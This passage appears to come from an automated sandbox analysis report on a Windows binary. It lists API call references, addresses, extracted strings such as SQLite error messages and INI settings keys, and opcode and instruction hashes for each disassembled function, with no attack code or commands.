                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                              • String ID: PD$PD
                                                                                                                                                                                                                              • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2163313125-0
                                                                                                                                                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$wcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                              • String ID: %s (%s)$YV@
                                                                                                                                                                                                                              • API String ID: 3979103747-598926743
                                                                                                                                                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                              • API String ID: 2780580303-317687271
                                                                                                                                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                              • API String ID: 2767993716-572158859
                                                                                                                                                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                              • String ID: ($d
                                                                                                                                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                              • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3015003838-0
                                                                                                                                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 59245283-0
                                                                                                                                                                                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                              • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2802642348-0
                                                                                                                                                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                              • String ID: 3A
                                                                                                                                                                                                                              • API String ID: 3300951397-293699754
                                                                                                                                                                                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                              • String ID: strings
                                                                                                                                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411AF6
